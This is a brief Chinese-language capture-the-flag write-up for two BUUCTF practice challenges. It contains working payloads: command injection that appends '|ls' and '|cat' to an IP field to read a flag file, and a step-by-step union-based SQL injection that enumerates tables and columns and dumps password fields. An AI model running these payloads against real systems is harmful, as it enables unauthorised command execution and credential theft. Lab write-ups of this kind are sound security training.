攻防世界靶场不知道咋了,又进不去了
那就刷几题BUUCTF吧
exec
这题题目名字给的挺明显的,命令执行
经检测,|,||没有被过滤,且有回显,那就一级级往上找就行了
127.0.0.1|ls ../../../
127.0.0.1|cat ../../../flag
LoveSql
SQL注入,注入点和之前一样的,一个单引号直接回显
那么后面就是payload了
admin 123' order by 4 # 开始报不同的错,可知列数为3
admin 123' union select 1,2,3 # 可知可用的是第二列和第三列
admin 123' union select 1,2,database() #可知当前数据库名称为geek
admin 123' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' # 得到geek数据库下面的两个表名
admin 123' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' # 得到列名
flag被隐藏在了password字段里,那么
admin 123' union select 1,2,group_concat(password) from l0ve1ysq1 #
另一种flag
admin 123' union select 1,2,password from l0ve1ysq1 where password like "%flag%" #
参考视频链接:
https://www.bilibili.com/video/BV1nb4y1S71V
https://www.bilibili.com/video/BV1YP4y1s7vq/